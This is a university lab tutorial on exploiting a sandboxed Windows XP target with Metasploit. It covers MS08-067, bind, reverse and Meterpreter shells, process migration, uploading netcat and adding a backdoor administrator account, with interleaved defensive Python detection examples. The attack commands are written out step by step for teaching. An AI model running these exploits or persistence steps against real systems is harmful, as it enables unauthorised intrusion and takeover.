

Exploitation using the Metasploit Framework (MSF)


Authors: Rich Macfarlane, Gordon Russell

This practical runs a Windows XP target, which we can then use to explore the many features of the Metasploit framework. Originally this was based on a pdf paper-based tutorial, but it has recently been integrated into linuxzoo.

Start your Kali Linux machine, and then you can boot the target below.

Topology
Figure 1: Lab Environment


Question 1: Target 2 - Boot

Press this button to ready your machine for running with the virtual machine targets. If your machine is reset or you reboot then you may have to press this button again.

Note that this target can take (quite) a few minutes to boot, as it has many processes running many services.


The machine can take a few minutes to warm up. Press the test button to see if it is running fully. So long as the network of the target is running, you can continue to the next question while you wait for the XP target.


Question 2: Network Device

Target 1 lies somewhere in 192.168.1.1 - 192.168.1.254. This time use "ip route show" and find out the device name on your machine which would be used to handle packets going to target 1. You can identify it by looking at the output, finding the line involved with the target subnet, and looking for the "dev".
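Reading the "dev" off the matching route by eye is what the question asks for; the following is an added example (not part of the linuxzoo lab) showing the same longest-prefix lookup the kernel performs, run over a constructed "ip route show" listing. The addresses, device names (eth0, br0) and the helper names are assumptions made for the example.

```python
import ipaddress

# Constructed sample of "ip route show" output (not captured from the lab);
# the addresses and device names are illustrative only.
SAMPLE_ROUTES = """\
default via 10.0.2.2 dev eth0 proto dhcp metric 100
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100
192.168.1.0/24 dev br0 proto kernel scope link src 192.168.1.10
"""


def parse_routes(text):
    """Turn each 'ip route show' line into a dict: network, dev, src, via."""
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        dest = fields[0]
        network = (ipaddress.ip_network("0.0.0.0/0") if dest == "default"
                   else ipaddress.ip_network(dest, strict=False))
        route = {"network": network, "dev": None, "src": None, "via": None}
        # Attributes follow the destination as "key value" pairs.
        for key, value in zip(fields[1:], fields[2:]):
            if key in ("dev", "src", "via"):
                route[key] = value
        routes.append(route)
    return routes


def route_for(text, target_ip):
    """Longest-prefix match: the route the kernel would choose for target_ip."""
    ip = ipaddress.ip_address(target_ip)
    matches = [r for r in parse_routes(text) if ip in r["network"]]
    if not matches:
        return None
    return max(matches, key=lambda r: r["network"].prefixlen)


def local_address_towards(text, target_ip):
    """The 'src' hint on the winning route, i.e. our own IP on that network."""
    route = route_for(text, target_ip)
    return route["src"] if route else None


if __name__ == "__main__":
    chosen = route_for(SAMPLE_ROUTES, "192.168.1.77")
    print("device:", chosen["dev"], "local ip:", chosen["src"])
```

Feed it the real output of `ip route show` and the target IP and it returns both answers for this question: the device in `dev` and your own address on that network in `src`. A host covered only by the default route falls through to the `via` gateway, which is the case to check when the target subnet is not directly attached.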

Target network device:


What is your machine's IP number on the target network?

Your IP:


Question 3: Network scanning with nmap

The target needs to be running before starting this question.

Use nmap to sweep the target network, and identify the IP address of target 1. Use the appropriate flags to keep this scan efficient.

Target IP:


On the target machine, list the first 3 port numbers found, in numerical order, from a standard nmap port scan of the common ports open on the target.

Open port 1
Open port 2
Open port 3


Question 4: Metasploit Framework

Before we use the Metasploit Framework, let's check the MSF database is running, and start it if not. Start the MSF database:

sudo msfdb start


Start the Metasploit Framework console interface.

msfconsole


We would typically now perform a vulnerability scan against our target using a full-blown scanner such as OpenVAS.

As Windows SMB services are running we could perform a quick assessment using the nmap NSE scripts in the vuln category, which check for some of the most well-known vulnerabilities.

Note: Some of the scripts are marked as intrusive and unsafe, which means they could crash the target system, so would not be used in a production environment.

Documentation of the Nmap SMB Vulnerability scanning Scripts under vuln: https://nmap.org/nsedoc/categories/vuln.html

nmap --script vuln 192.168.1.x

Note if the target fails during the test, go to the bottom of the tutorial and click the button to stop the target, then go to the top of the tutorial and use the buttons to restart and test the target.

What CVE-rated issue was identified with a year of 2017?


Explore Metasploit via the File System

The various elements of the MetaSploit Framework (MSF) are stored under the directory /usr/share/metasploit-framework including the exploit and payload Ruby scripts themselves.

Change to this directory, and list the contents.

Figure 2: metasploit directories

Which directory holds the built in vulnerability scanners?
/usr/share/metasploit-framework/


Change to the exploits directory and list the contents.

How are the exploits sorted?

Where might exploits which work on several different OS's be stored?


Change to the directory where the Windows exploits are, and list the contents.

How are the Windows exploits sorted?

Note: The exploits contained here are for the OS and for applications which run on the OS.


Change to the directory where the Windows Server Message Block (SMB) exploits are, and list the contents.

Edit one of the Ruby exploit scripts (or use less to view it), for the well-known vulnerability MS08_067.

What is the associated CVE for this exploit script? Use the format "CVE 2025-0001".
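Reading the header of a module by hand answers this question; when a defender needs the same facts (CVE references, disclosure date, which Windows builds a module targets) for many modules, it is worth parsing the `update_info` block. The following is an added example, not code from the lab or from Metasploit: it runs over a constructed stand-in for a module header, so the name, the placeholder references ('CVE', '2020-0000' and 'MSB', 'MS00-000') and the target list are invented for the example and are not the values in the ms08_067 script.

```python
import re

# Constructed stand-in for a Metasploit module header. It is not a real
# module and not the ms08_067 script; the reference IDs are placeholders.
SAMPLE_MODULE = """
class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Constructed Example Module (not a real exploit)',
      'Description'    => 'Placeholder description.',
      'Platform'       => 'win',
      'DisclosureDate' => '2020-01-01',
      'References'     =>
        [
          ['CVE', '2020-0000'],
          ['MSB', 'MS00-000'],
          ['URL', 'https://example.invalid/advisory']
        ],
      'Targets'        =>
        [
          ['Windows XP SP3 English', {}],
          ['Windows 2003 SP2', {}]
        ]
    ))
  end
end
"""


def parse_module_metadata(src):
    """Pull the human-readable metadata out of a module's update_info block."""
    meta = {}
    for key in ("Name", "Platform", "DisclosureDate"):
        m = re.search(r"'%s'\s*=>\s*'([^']*)'" % key, src)
        meta[key] = m.group(1) if m else None
    # Reference entries look like ['CVE', '2020-0000']. Target entries carry a
    # hash as their second element, so they do not match this pattern.
    refs = re.findall(r"\[\s*'([A-Z]+)'\s*,\s*'([^']+)'\s*\]", src)
    meta["references"] = refs
    meta["cves"] = ["CVE-" + ident for kind, ident in refs if kind == "CVE"]
    # The Targets array ends at the ']' that is followed by the closing ')'.
    targets = re.search(r"'Targets'\s*=>\s*\[(.*?)\]\s*\)", src, re.S)
    meta["targets"] = (re.findall(r"\[\s*'([^']+)'", targets.group(1))
                       if targets else [])
    return meta


def module_lists_target(meta, platform_substring):
    """True if any target name mentions the platform, e.g. 'Windows XP'."""
    return any(platform_substring in t for t in meta["targets"])


if __name__ == "__main__":
    info = parse_module_metadata(SAMPLE_MODULE)
    print(info["Name"], info["cves"], info["targets"])
```

Pointed at a real module file (read its text into `src`), the same regexes give the CVE in the "CVE-xxxx-xxxx" form the later questions ask for, and `module_lists_target` answers "does this module claim to work against the builds we run" without reading the exploit body.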


Google for the CVE and check the mitre database (cve.mitre.org) - What date was the vulnerability entry first published? Use the format 2025-12-31.

Try to find the Exploit-Db entry(s). What is the lowest-numbered entry?

From your research which versions of Windows XP Professional are vulnerable?


Change into the singles payload directory, and then into the windows payloads directory.

Which payload would be used to create a new user on the target machine?

Which payload would be used to create a TCP listener on a port on the target, and create and bind a command shell to it?


Examine the newuser.rb script.

Which Windows command is executed on the target machine to create the new user?


Examine the shell_bind_tcp.rb script and review the payload itself.

Approx. how many bytes of shellcode are in the payload?


Question 5: Framework

Now the Metasploit Framework services are running we can explore the various parts of the framework.

Metasploit Framework
Figure 3: Metasploit framework

There are several interfaces we can use to interact with the MSF (MetaSploit Framework) exploit/payload/auxiliary modules, including msfcli, msfconsole, and a web-based interface.

You should have already started the metasploit console, but if not start the Metasploit MsfConsole interface from a terminal window. You should get a strange and fairly unique ascii graphic:

Metasploit Framework
Figure 4: Console

Which version of Metasploit is reported? It is in the form "v0.0.0" or "v0.0.0-string".

How many exploits does it contain?

How many payloads does it contain?


Use the show exploits command to list all available exploits. We can mix and match exploits and associated payloads using MSF, as shown below:

Exploit modules
Figure 5: Exploit Modules

The search command can help us find useful exploits. Use search -h to check the help for the command.

Note: for older versions of MSF you may need to run db_rebuild_cache if MSF reports the cache isn't built or needs to be rebuilt.

Use the search type:exploit name:smb command to list only the windows smb exploits:

Search
Figure 6: Search

Use the search command to list the exploit modules that have been added in 2020.
How many exploit modules were added?

What is the exploit module filename for this?

Which type of memory mgt exploit is this?

Is it a remote/client-side/local exploit?


Each exploit and payload has information related to it stored in the framework. Select a payload name from the show command output and use the following command to display details about the respective module. View several to get a feel for the structure of the information provided.

info <Name Of Payload/Exploit>

(Use the <TAB KEY> to auto complete commands and values, or cut and paste the full name)

Search for the windows smb netapi exploits. Find the netapi exploit name of the ms08_067 exploit, and copy it from the screen.

netapi module
Figure 6: netapi module

The MSF command use allows us to select an exploit module to use. Paste the exploit name onto the msfconsole command line:

use exploit/windows/smb/ms08_067_netapi

What has the msfconsole prompt changed to?


We are now in exploit command mode. If you check the help now, you should see we have more commands. The info command gives details on this particular exploit.

The show options command can now be used to check the options for the selected exploit.

show options
Figure 7: show options

From the file system, find the exploit module and review the contents.

show options
Figure 8: Module Review

Which CVE number is listed in the exploit module code, in the format CVE-xxxx-xxxx?

Look up the vulnerability on the NVD database online. Which CWE category is listed against the vulnerability, in the format CWE-xx?

Is it a remote/client-side/local exploit?


This is a remote exploit for the vulnerability in the Windows SMB network server service.

SMB Layout
Figure 9: SMB Layout

Payloads and Options
To check the possible payloads compatible with this exploit module, use the show payloads command.

Possible Payloads
Figure 10: Possible Payloads

Try using the msf grep command to filter out the bind shells.

Grep for bind
Figure 11: Bind Grep

Note the msf grep command can take flags. You can check those out using "grep help".

How many bind shell payloads are compatible with the selected exploit?


The set command can be used to set the PAYLOAD option for our exploit.

Try typing set PAYLOAD <TAB KEY> <TAB KEY> and autocomplete should show all possible payloads and page nicely.

We can select a Bind Shell payload to add to our Exploit, which will start a listener on the target, allowing Metasploit to connect, and then the payload will spawn a shell and bind this shell to the connection.

Bind Payload
Figure 12: Bind Payload

Select the name of a windows TCP Bind Shell payload shown below (copy+paste or use auto complete for the payload value – using TABs, or use the index from the search output):

TCP Bind Payload
Figure 13: Select the correct payload

Note: If you type set PAYLOAD windows/shell<TAB><TAB> MSF displays only the possible windows shell-based payloads for the exploit.

The payload we are using here is "windows/shell_bind_tcp", and not any other payload by a similar sounding name or in a different directory.

Which type of bind shell payload is this: single or staged?


The show options command can now be used to check the options for the selected exploit and payload modules selected:

Payload options
Figure 14: Payload Options

Note: the separate sections for the Exploit and Payload options.

Which option is mandatory and currently not set?


Set any mandatory options needed to run the exploit; in this case possibly the target host. (Check the Required col, and use the set msfconsole cmd)

Check the options have been set correctly using show options again (or use up arrow twice).

Which port is the Bind Shell payload going to start the listener on? Can you draw your own diagram with the smb service, bind shell listener, and network communications?


To send the exploit and payload to the target use the exploit command. (got to be the best cmd in any tool ever!)

You should see helpful debug messages until you get a message saying if the exploit was successful or not. If the exploit is successful, the payload should execute, and the action should be carried out.

If the exploit was successful you should get a cmd shell on the target!

Shell opened
Figure 15: Remote Shell Open

Did the exploit work, and has the shell payload been launched? Check using the Windows ipconfig command.
What is the IP Address of the target reported from the ipconfig command?


In a Kali cmd shell, check the connection of our payload using:

ss -a | grep 4444

Use the Windows cd command to check the working directory, and the dir command to check the contents of the current directory.

What is the current working directory, using cd?

We can use environment variables to find out some useful information. Try set COMPUTERNAME, which is the local name for this machine.
What is the current COMPUTERNAME?


From the Target machine shell, check the network services running and especially any established connections using netstat -an

It should look similar to the following:

netstat example
Figure 16: Netstat example

Identify the bind shell MSF payload connection.

What are the port numbers used in the connection?

Target end: msfconsole end:

Check the associated processes for the payload connection using the netstat command with the -o flag added.

Can you identify the process id (pid) for the bind shell MSF payload connection?

Review the running executables and the associated processes using the windows command tasklist
Can you identify the executable process the bind shell is attached to?
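The netstat -ano and tasklist correlation above is exactly what an incident responder does on a suspect host, and across a fleet it is scripted rather than done by eye. The following is an added example, not part of the lab: it parses constructed sample output in the layout of Windows XP's netstat -ano and tasklist (the addresses, PIDs, ports and image names are invented for the example), joins the two on PID, and reports every TCP listener or established connection that is not on a known service port together with the process image it belongs to.

```python
import re

# Constructed netstat -ano output (not captured from the lab target).
NETSTAT_ANO = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1044
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:4444      192.168.1.10:38822     ESTABLISHED     1044
  UDP    0.0.0.0:445            *:*                                    4
"""

# Constructed tasklist output (image names and PIDs are illustrative).
TASKLIST = """\
Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
svchost.exe                  912 Console                 0      4,900 K
svchost.exe                 1044 Console                 0      5,120 K
explorer.exe                1500 Console                 0     18,200 K
"""


def parse_netstat(text):
    """One dict per TCP/UDP row; UDP rows have no State column."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] not in ("TCP", "UDP"):
            continue
        if fields[0] == "TCP":
            proto, local, foreign, state, pid = fields
        else:
            proto, local, foreign, pid = fields
            state = ""
        local_ip, local_port = local.rsplit(":", 1)
        rows.append({"proto": proto, "local_ip": local_ip,
                     "local_port": int(local_port), "foreign": foreign,
                     "state": state, "pid": int(pid)})
    return rows


def parse_tasklist(text):
    """Map PID -> image name; header and separator lines do not match."""
    procs = {}
    for line in text.splitlines():
        m = re.match(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K$", line)
        if m:
            procs[int(m.group(2))] = m.group(1).strip()
    return procs


def find_unexpected_connections(netstat_text, tasklist_text, expected_ports):
    """TCP listeners/connections off the expected ports, joined to their process."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for row in parse_netstat(netstat_text):
        if row["proto"] != "TCP" or row["local_port"] in expected_ports:
            continue
        if row["state"] in ("LISTENING", "ESTABLISHED"):
            findings.append({**row, "image": procs.get(row["pid"], "<unknown>")})
    return findings


if __name__ == "__main__":
    for f in find_unexpected_connections(NETSTAT_ANO, TASKLIST, {135, 139, 445}):
        print(f["state"], f["local_ip"], f["local_port"], f["foreign"],
              f["pid"], f["image"])
```

The expected-port set is the baseline for the host (here the SMB/RPC ports the lab target is known to serve); anything else that is listening or established is surfaced with its owning image, which is the "which executable is the shell attached to" question answered for every row at once. A payload that runs inside an existing service process shows up under that service's image name, which is why the PID join, not the image name alone, is what identifies it.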


Run tcpdump or Wireshark and filter for your Meterpreter connection. Check if you can view the commands and shell output in the connection.

What tcpdump command filters for the payload connection? Do it in ASCII, use the local bridge device, and select the known msf port number.
sudo tcpdump -ni port
Can the shell content be captured and understood?
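What tcpdump -A shows is each packet's payload with non-printable bytes replaced by dots, and a network monitor asks the same question as this section in automated form: does a flow carry a readable command shell? The following is an added example, not part of the lab, and it serves both this tcpdump question and the later one for the Meterpreter session: it reassembles constructed packets (addresses, ports and payload bytes are invented for the example) into per-flow ASCII the way the -A view does, and flags flows whose text contains the cmd.exe banner or a drive-letter prompt. The second flow carries opaque bytes and is there to show what a channel with no cleartext shell content looks like to the same check.

```python
import re
from collections import defaultdict

# Constructed packets, not a real capture: (src, sport, dst, dport, payload).
# Flow 1 carries a plain cmd.exe session; flow 2 carries opaque binary data.
PACKETS = [
    ("192.168.1.20", 4444, "192.168.1.10", 38822,
     b"Microsoft Windows XP [Version 5.1.2600]\r\n"
     b"(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>"),
    ("192.168.1.10", 38822, "192.168.1.20", 4444, b"ipconfig\r\n"),
    ("192.168.1.20", 4444, "192.168.1.10", 38822,
     b"ipconfig\r\n\r\nWindows IP Configuration\r\n\r\nC:\\WINDOWS\\system32>"),
    ("192.168.1.20", 1080, "192.168.1.10", 799,
     bytes.fromhex("00000024000000010f8ce1b2d7490ac0ffe3")),
    ("192.168.1.10", 799, "192.168.1.20", 1080,
     bytes.fromhex("a000000001d5ee9cfffe137f08c2")),
]

# Signatures of an interactive Windows command shell in the clear.
SHELL_PATTERNS = {
    "cmd_banner": re.compile(r"Microsoft Windows [^\r\n]*\[Version"),
    "drive_prompt": re.compile(r"[A-Za-z]:\\[^\r\n>]*>"),
}


def ascii_view(payload):
    """Mimic tcpdump -A: keep printable ASCII (and tab/CR/LF), dot the rest."""
    return "".join(chr(b) if 32 <= b < 127 or b in (9, 10, 13) else "."
                   for b in payload)


def flow_key(src, sport, dst, dport):
    """Direction-independent key so both halves of a conversation join up."""
    return tuple(sorted([(src, sport), (dst, dport)]))


def reassemble(packets):
    """Concatenate each flow's payloads, in capture order, as ASCII text."""
    flows = defaultdict(str)
    for src, sport, dst, dport, payload in packets:
        flows[flow_key(src, sport, dst, dport)] += ascii_view(payload)
    return flows


def flag_cleartext_shells(packets):
    """Return {flow_key: [matched signature names]} for readable shell flows."""
    hits = {}
    for key, text in reassemble(packets).items():
        evidence = [name for name, pat in SHELL_PATTERNS.items() if pat.search(text)]
        if evidence:
            hits[key] = evidence
    return hits


if __name__ == "__main__":
    for key, why in flag_cleartext_shells(PACKETS).items():
        print(key, "->", why)
```

The two signatures are deliberately narrow (the version banner cmd.exe prints on start, and a prompt of the form C:\...>), so the check reads as evidence rather than a guess; a real monitor would add the reverse direction (typed commands) and a printable-byte ratio, but the reassembly-then-match structure is the same. Port numbers are not in the signature at all, which is the point: the lab's listener port is known here, but a defender cannot rely on it.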


Question 6: VNC to Target 1

Let's logon to our target and check these things.

From Kali, open a new terminal window and get a VNC remote desktop to the target, using the vncviewer tool. From the new terminal window type:

vncviewer :1

Validate the IP Address of the target and working directory from a Windows command window.

Command window in XP
Figure 18: Commands in target 1 using VNC

On the Target machine, again check the listening services and established connections using netstat -an

From Kali, check the listening services and connections using ss -ln and ss -an

Once the question is complete, exit from the remote shell inside msfconsole, using the exit command or CTRL C.

What is the IP number of the server (listener)?

Which is the IP number of the attacker?

Is the listener on the target or on the attacking machine?


Question 7: Reverse Shell Payload

Now we can try the same exploit with a different payload. Keep using the ms08_067_netapi exploit. This time we will use a Reverse Bind Shell payload. This creates a Listener (a Handler) on Kali, and the exploit connects back and binds a shell to the connection.

Reverse Shell
Figure: Reverse Shell

From Kali, we can use the same exploit, but this time let's swap the payload for a TCP Reverse Bind Shell payload, and set the listener port to 777.

Setting the payload
Figure: Setting the payload

Check the options with show options

Why do you have to set a listener port?

Which type of shell payload is this: single or staged?

Setting the options needed
Figure: Options Needed

Set the options needed and run the exploit against the target XP machine.

Did the exploit work, and has the reverse shell payload been launched? Check using ipconfig command

From Kali, check the listening services and connections using ss -ln and ss -an

On the target server and check the listeners and connections using netstat -na

Which machine is the client and which is the server (handler) for this payload?
Kali machine is and Windows machine is the

Sessions
Sessions are the currently connected payloads. To keep the reverse shell payload session and work on another, we can put the connection into the background with <CTRL+Z> from the shell we have.

Putting a session into the background
Figure: Background Session

To interact with the session again we can use sessions -i sessionnumber

Join a session
Figure: Rejoin a session

To kill a session again we can use sessions -k sessionnumber.

Note: The back command can be used to exit out of the exploit command mode, if you want to change to a different exploit.


Question 8: Meterpreter Shell Payload

The Meterpreter or "MetaSploit Interpreter" shell payload is the most powerful MSF payload, and improves on a target cmd.exe shell. It is a staged payload, implemented as a DLL which is injected into the exploited process's memory (so it has no footprint on the target disk).

Shell Payload
Figure: Shell payload

Review the various Meterpreter payloads using:

set PAYLOAD windows/met <TAB><TAB>
  
Payload options
Figure: Payload Options

Use a Reverse TCP Meterpreter Shell payload, and check the options needed.

MAKE SURE to change the listening port. Set the listening port to be 799.

Which machine will run the listener (the reverse handler) on the specified port?


Before running the exploit, in your other terminal window, check the listening ports on Kali using ss -ln

Run the exploit, delivering the Meterpreter payload.

run the exploit
Figure: Run the exploit

From Kali, check the services running and established connections using ss -an.

On the Target machine, check the listening services running and connections using netstat -an

Should be similar to the below:

netstat output
Figure: netstat output

Which port is the listener for this payload?

Which port is used on the target?


In the Meterpreter shell, we have a range of Meterpreter commands for Windows target post-exploitation. The UP ARROW key and TAB key work. Check the Meterpreter shell help using the Meterpreter ? command.

Note: Use the lecture notes as reference, and most commands have help via -h

Which Meterpreter command gets information about the target system?

Which Build of XP is reported by the command?


Check the network address of the target with the Meterpreter ipconfig command

ipconfig output
Figure: ipconfig output

What is the MAC Address of the target systems Ethernet interface?


Run tcpdump or Wireshark and filter for your Meterpreter connection. Check if you can view the commands and shell output in the connection.

What tcpdump command filters for the payload connection? Do it in ASCII, use the local bridge device, and select the known msf port number.
sudo tcpdump -ni port
Can the shell content be captured and understood?


Check the username we are running as on the target using the Meterpreter command getuid

What is the user we have inherited on the target? Use the form DOMAIN\USERNAME

Why is this?


From the Meterpreter shell, check the running processes on the target using getpid and ps

Find the process id of the exploited process which Meterpreter is running inside.

What is the process id which Meterpreter is running in?

What is the name of the process?


If we had exploited a process which might crash, or which the user might close, Meterpreter provides a facility to migrate into another process. We would typically migrate to a process which will not terminate.

What is the process id of the winlogon.exe process?


From the Meterpreter shell use the migrate command to move processes to the winlogon.exe process.

What is the process id which Meterpreter is now running in? Verify this using getpid.

What is the name of the process?


Check the current working directory with the Meterpreter command pwd

What is the current working dir?


Create a directory c:\test on the target machine using the Meterpreter command mkdir. Check it has been created using cd and ls.

Note: it is easier to cd and then mkdir, then ls. The Meterpreter shell uses Unix-like forward slashes rather than Windows-like backslashes, so it is "cd c:/" not "cd c:\". Confusing!

cd and ls
Figure: cd and ls

Downloading Files
Use Meterpreter command lcd to change to /home/kali user's home directory on the Kali machine. Then change to the Windows directory on the target box. Download the winnt.bmp file from the target using the command download

What size is the downloaded file in bytes?


The search command can be useful in finding files on the target. Locate all the ntuser.dat.log files.

Which common directory are all these files under? Include the drive letter and the trailing slash, using Windows slashes. It is case sensitive, and the volume is returned in lower case.


Uploading Tools
Kali provides us with many useful tools which we can upload to a target. From Kali, change to the /usr/share/windows-binaries directory and list the contents. In the Meterpreter shell, change to the c:\test dir on the target machine. Use the upload command to upload the nc.exe Windows netcat executable to the target machine.

upload example
Figure: upload example

We could now use this to port scan an internal network... only if that was part of the penetration testing rules of engagement/scope of agreed testing!


Windows Shell
We can also spawn a cmd.exe shell on our target. This extra layer of shell can be useful: if the cmd.exe crashes or exits for some reason, we still have our Meterpreter shell and can create another shell.

Try the shell command:

running shell
Figure: running the shell

Now from the new shell, use the Windows tasklist command to display the running processes on the target.

What is the process id of this cmd.exe shell?

Does the cmd cls clear the screen as it is meant to? Why not?


Windows Command Line Fun
Check the user accounts on the target with:

net user

As we have SYSTEM privileges let's add a user to the target machine for future use. This type of activity would have to be within your rules of engagement and perhaps discussed with the customer!

net user username userpasswd /add

user add example
Figure: user add example

Add a new user called "rich" with password "richpass". Verify this using "net user".

check user added example
Figure: check user added example

Check the user accounts which are in the local administrator group on the target with:

net localgroup administrators

This could be interesting as often the same local admin accounts are duplicated across different systems in a domain. Let's upgrade our new user account, and add it to the local administrator group:

net localgroup administrators username /add

admin change example
Figure: changing a user to an admin
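The two net commands above leave a recognisable trail in the Windows Security log: an account-created event followed within seconds by an added-to-Administrators event, both with a non-interactive subject such as SYSTEM. The following is an added example, not part of the lab, of the check a SOC would run for that pattern. It uses simplified event records constructed here (field names are reduced to what the check needs; the 4720 and 4732 event IDs are the real Windows ones, the "rich"/"intern" accounts and timestamps are invented), and it flags a creation-then-admin sequence only when the two fall within a configurable window.

```python
from datetime import datetime, timedelta

# Constructed, simplified Windows Security event records (not a real log
# export). Event IDs: 4720 = a user account was created,
# 4732 = a member was added to a security-enabled local group.
EVENTS = [
    {"time": "2025-01-01T10:05:12", "id": 4720,
     "subject": "NT AUTHORITY\\SYSTEM", "target": "rich"},
    {"time": "2025-01-01T10:05:40", "id": 4732,
     "subject": "NT AUTHORITY\\SYSTEM", "target": "rich",
     "group": "Administrators"},
    {"time": "2025-01-01T11:30:00", "id": 4720,
     "subject": "XPBOX\\helpdesk", "target": "intern"},
    {"time": "2025-01-02T09:00:00", "id": 4732,
     "subject": "XPBOX\\helpdesk", "target": "intern",
     "group": "Administrators"},
]


def find_rapid_admin_creation(events, window=timedelta(minutes=10),
                              group="Administrators"):
    """Flag accounts created and then added to `group` within `window`.

    "net user X /add" followed by "net localgroup administrators X /add"
    produces exactly this 4720 -> 4732 pair, seconds apart, from the same
    subject; the returned alert records who did it and how quickly.
    """
    created = {}   # target user -> (creation time, creation event)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"]] = (when, ev)
        elif (ev["id"] == 4732 and ev.get("group") == group
              and ev["target"] in created):
            created_at, creation = created[ev["target"]]
            gap = when - created_at
            if timedelta(0) <= gap <= window:
                alerts.append({
                    "user": ev["target"],
                    "subject": ev["subject"],
                    "created_by": creation["subject"],
                    "seconds_between": int(gap.total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_rapid_admin_creation(EVENTS):
        print("new local admin:", alert["user"], "by", alert["subject"],
              "after", alert["seconds_between"], "s")
```

The window is what separates this from routine administration: the "intern" account in the sample is promoted the next day by a help-desk user and is not flagged at the default ten minutes, while the "rich" account created and promoted 28 seconds apart by SYSTEM is. Widening the window (the test below uses two days) turns the check into a plain inventory of new administrators.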

We can use the windows shell to review machines the target has been in contact with, which could be interesting to check if they are in the scope of the penetration test. For example by dumping the target's ARP cache:

arp -a

What mac address has been learned? Use the lowercase format with "-" between the groups.


If we only have a Windows cmd line, we can use the dir cmd to do searches on the filesystem. Make sure your current directory is C:\

Try searching for all pdf files with:

dir "\*.pdf" /s

Can you produce a cmd to search for all log files in a similar way? What is the filename of the last log file found using this technique?

Can you find any files ending in ".pif"? What is the filename called?


Question 9: Target 2 - Shutdown

THIS BUTTON IS ONLY NEEDED IF TARGET MACHINE IS RUNNING BUT BECOMES UNRESPONSIVE OR DAMAGED. That is rare. You can also use this button if you are finished with the tutorial and simply want to shutdown all the targets.




Linuxzoo created by Gordon Russell.
@ Copyright 2004-2025 Edinburgh Napier University